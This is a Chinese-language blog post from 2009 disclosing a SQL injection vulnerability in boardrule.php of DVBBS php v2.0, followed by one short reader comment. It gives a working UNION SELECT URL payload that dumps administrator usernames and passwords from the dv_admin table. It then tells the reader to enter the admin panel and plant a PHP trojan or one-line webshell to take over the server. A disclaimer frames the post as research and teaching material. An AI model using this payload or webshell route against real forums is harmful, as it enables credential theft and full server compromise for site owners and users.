Home » 网络安检 » 漏洞公告 » DVBBS php v2.0 boardrule.php注入漏洞

”DVBBS php v2.0 boardrule.php注入漏洞

Posted by 白大王 on 九 4, 2009 in 漏洞公告 |

【白银时代】备注：本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

boardrule.php存在sql注入漏洞。
<*参考http://p.dvbbs.net/*>

测试方法:
boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/

admin/index.php

进入后台即可了．．．

模板CSS里添加上php木马，或者用一句话木马连接即可拿到webshell了。

本文来源于：漏洞公告。转载请保留这个链接，不会对你的SEO大业产生影响。

One Response 至“”DVBBS php v2.0 boardrule.ph””

0cai says:
2009年09月30日 at 上午 12:23

不是很懂这个东西 **是什么？

回复

”DVBBS php v2.0 boardrule.php注入漏洞

留下回复

相关日志

近期评论

链接表

”DVBBS php v2.0 boardrule.php注入漏洞

留下回复

相关日志

热门标签

近期评论

链接表